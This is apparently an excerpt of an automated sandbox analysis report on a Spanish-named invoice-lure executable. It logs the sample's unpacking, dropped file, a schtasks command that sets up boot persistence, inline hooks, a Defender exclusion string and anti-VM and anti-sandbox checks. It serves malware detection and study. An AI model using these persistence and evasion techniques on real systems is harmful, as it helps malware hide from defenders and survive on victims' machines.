            Source: C:\Users\user\Desktop\Factura de proforma.exe | File read: C:\Users\user\Desktop\desktop.ini
            Source: C:\Users\user\Desktop\Factura de proforma.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
            Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6824:120:WilError_01
            Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6960:120:WilError_01
            Source: C:\Windows\explorer.exe | File read: C:\Windows\System32\drivers\etc\hosts
            Source: C:\Users\user\Desktop\Factura de proforma.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
            Source: Factura de proforma.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
            Source: Factura de proforma.exe | Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
            Source: Binary string: cscript.pdbUGP source: RegSvcs.exe, 00000006.00000002.406155784.00000000036A0000.00000040.00020000.sdmp
            Source: Binary string: RegSvcs.pdb, source: cscript.exe, 0000000A.00000002.573045416.0000000004CEF000.00000004.00020000.sdmp
            Source: Binary string: wntdll.pdbUGP source: RegSvcs.exe, 00000006.00000002.402914826.00000000015C0000.00000040.00000001.sdmp, cscript.exe, 0000000A.00000002.572701700.00000000048DF000.00000040.00000001.sdmp
            Source: Binary string: wntdll.pdb source: RegSvcs.exe, cscript.exe
            Source: Binary string: RegSvcs.pdb source: cscript.exe, 0000000A.00000002.573045416.0000000004CEF000.00000004.00020000.sdmp
            Source: Binary string: cscript.pdb source: RegSvcs.exe, 00000006.00000002.406155784.00000000036A0000.00000040.00020000.sdmp

            Data Obfuscation:

            .NET source code contains potential unpacker
            Source: Factura de proforma.exe, MapEditor1/CreateMapDialog.cs.Net Code: Marshaler System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
            Source: tskpCbAwtxoaw.exe.0.dr, MapEditor1/CreateMapDialog.cs.Net Code: Marshaler System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
            Source: 0.0.Factura de proforma.exe.7a0000.0.unpack, MapEditor1/CreateMapDialog.cs.Net Code: Marshaler System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
            Source: 0.2.Factura de proforma.exe.7a0000.0.unpack, MapEditor1/CreateMapDialog.cs.Net Code: Marshaler System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
            Source: C:\Users\user\Desktop\Factura de proforma.exeCode function: 0_2_070C4BBD push FFFFFF8Bh; iretd
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0041D4B5 push eax; ret
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0041D56C push eax; ret
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0041D502 push eax; ret
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0041D50B push eax; ret
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00419F75 push ebx; iretd
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0163D0D1 push ecx; ret
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0483D0D1 push ecx; ret
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_029A9F75 push ebx; iretd
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_029AD4B5 push eax; ret
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_029AD50B push eax; ret
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_029AD502 push eax; ret
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_029AD56C push eax; ret
            Source: initial sampleStatic PE information: section name: .text entropy: 7.7904887088
            Source: C:\Users\user\Desktop\Factura de proforma.exeFile created: C:\Users\user\AppData\Roaming\tskpCbAwtxoaw.exeJump to dropped file

            Boot Survival:

            Uses schtasks.exe or at.exe to add and modify task schedules
            Source: C:\Users\user\Desktop\Factura de proforma.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\tskpCbAwtxoaw' /XML 'C:\Users\user\AppData\Local\Temp\tmpD689.tmp'

            Hooking and other Techniques for Hiding and Protection:

            Modifies the prolog of user mode functions (user mode inline hooks)
            Source: explorer.exeUser mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x8D 0xDE 0xE0
            Source: C:\Users\user\Desktop\Factura de proforma.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\cscript.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

            Malware Analysis System Evasion:

            Yara detected AntiVM3
            Source: Yara matchFile source: 0.2.Factura de proforma.exe.2bd16b0.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000000.00000002.322371267.0000000002B81000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: Factura de proforma.exe PID: 6952, type: MEMORYSTR
            Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
            Source: Factura de proforma.exe, 00000000.00000002.322371267.0000000002B81000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL
            Source: Factura de proforma.exe, 00000000.00000002.322371267.0000000002B81000.00000004.00000001.sdmpBinary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
            Tries to detect virtualization through RDTSC time measurements
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeRDTSC instruction interceptor: First address: 0000000000409904 second address: 000000000040990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeRDTSC instruction interceptor: First address: 0000000000409B7E second address: 0000000000409B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
            Source: C:\Windows\SysWOW64\cscript.exeRDTSC instruction interceptor: First address: 0000000002999904 second address: 000000000299990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
            Source: C:\Windows\SysWOW64\cscript.exeRDTSC instruction interceptor: First address: 0000000002999B7E second address: 0000000002999B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\Factura de proforma.exe TID: 6384Thread sleep time: -45175s >= -30000s
            Source: C:\Users\user\Desktop\Factura de proforma.exe TID: 4852Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\explorer.exe TID: 7112Thread sleep time: -30000s >= -30000s
            Source: C:\Windows\SysWOW64\cscript.exe TID: 6368Thread sleep time: -32000s >= -30000s
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\explorer.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\cscript.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00409AB0 rdtsc
            Source: C:\Users\user\Desktop\Factura de proforma.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\SysWOW64\cscript.exeProcess information queried: ProcessInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeThread delayed: delay time: 45175
            Source: C:\Users\user\Desktop\Factura de proforma.exeThread delayed: delay time: 922337203685477
            Source: Factura de proforma.exe, 00000000.00000002.322371267.0000000002B81000.00000004.00000001.sdmpBinary or memory string: VMware SVGA IIBAdd-MpPreference -ExclusionPath "
            Source: explorer.exe, 00000007.00000000.362850284.0000000000B7D000.00000004.00000020.sdmpBinary or memory string: AGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
            Source: Factura de proforma.exe, 00000000.00000002.322371267.0000000002B81000.00000004.00000001.sdmpBinary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
            Source: explorer.exe, 00000007.00000000.352399767.00000000086C9000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
            Source: Factura de proforma.exe, 00000000.00000002.322371267.0000000002B81000.00000004.00000001.sdmpBinary or memory string: vmware
            Source: explorer.exe, 00000007.00000000.354893243.000000000EE50000.00000004.00000001.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}B
            Source: explorer.exe, 00000007.00000000.375277413.0000000008778000.00000004.00000001.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000}
            Source: explorer.exe, 00000007.00000000.333973345.00000000067C2000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
            Source: explorer.exe, 00000007.00000000.352399767.00000000086C9000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}&
            Source: explorer.exe, 00000007.00000000.333973345.00000000067C2000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000m32)
            Source: explorer.exe, 00000007.00000000.337688862.00000000087C2000.00000004.00000001.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}oft.Mic
            Source: explorer.exe, 00000007.00000000.352399767.00000000086C9000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
            Source: Factura de proforma.exe, 00000000.00000002.322371267.0000000002B81000.00000004.00000001.sdmpBinary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00409AB0 rdtsc
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0160B944 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015EB171 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015EC962 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01604120 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01604120 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0161513A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015E9100 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_016741E8 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015EB1E1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_016669A6 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_016161A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_016651BE mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0160C182 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0161A185 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01612990 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_016A2073 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_016B1074 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01600050 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0161002D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01667016 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015FB02A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_016B4015 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015E58EC mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0167B8D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0167B8D0 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0167B8D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_016120A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_016290AF mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015E9080 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0161F0BF mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0161F0BF mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01663884 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015EF358 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01613B7A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015EDB40 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_016B8B58 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015EDB60 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_016A131B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_016103E2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0160DBE9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_016653CA mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01614BAD mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_016B5BA5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015F1B8F mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_016A138A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0169D380 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0161B390 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01612397 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0169B260 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_016B8A62 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0162927A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015E9240 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01674257 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015EAA16 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01624A2C mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015E5210 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015E5210 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015E5210 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015F8A0A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01603A1C mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01612AE4 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01612ACB mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0161FAB0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015FAAB0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0161D294 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015E52A5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0160C577 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01623D43 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01663540 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01607D50 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0166A537 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01614D3B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_016B8D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015F3D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015EAD30 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01698DF1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01666DC9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01666DC9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01666DC9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01666DC9 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01666DC9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01666DC9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015FD5E0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015FD5E0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_016135A1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_016B05AC mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_016B05AC mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015E2D8A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015E2D8A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015E2D8A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015E2D8A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015E2D8A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01611DB5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01611DB5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01611DB5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01612581 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01612581 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01612581 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01612581 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0161FD9B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0161FD9B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0160746D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0161A44B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0167C450 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0167C450 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0161BC2C mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_016B740D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_016B740D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_016B740D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_016A1C06 mov eax, dword ptr fs:[00000030h]
